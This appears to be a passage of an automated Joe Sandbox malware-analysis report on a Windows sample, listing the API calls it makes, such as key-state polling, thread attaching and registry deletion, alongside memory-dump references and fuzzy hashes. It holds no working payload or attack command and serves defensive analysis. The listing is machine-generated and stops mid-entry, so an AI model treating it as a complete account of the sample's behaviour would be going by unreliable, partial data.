                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                  • String ID: \VH
                                                                                  • API String ID: 3884216118-234962358
                                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                  • IsMenu.USER32(?), ref: 0044854D
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                  • DrawMenuBar.USER32 ref: 004485AF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                  • String ID: 0
                                                                                  • API String ID: 3076010158-4108050209
                                                                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_memmove_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1589278365-1403004172
                                                                                  • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                  • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle
                                                                                  • String ID: nul
                                                                                  • API String ID: 2519475695-2873401336
                                                                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle
                                                                                  • String ID: nul
                                                                                  • API String ID: 2519475695-2873401336
                                                                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 0-1011021900
                                                                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                  APIs
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                  • GetFocus.USER32 ref: 0046157B
                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                  • __swprintf.LIBCMT ref: 00461608
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 2645982514-1110647743
                                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 3488606520-0
                                                                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 15295421-0
                                                                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                  • String ID:
                                                                                  • API String ID: 2449869053-0
                                                                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 004563A6
                                                                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3539004672-0
                                                                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 327565842-0
                                                                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                  • String ID:
                                                                                  • API String ID: 2832842796-0
                                                                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Enum$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2095303065-0
                                                                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
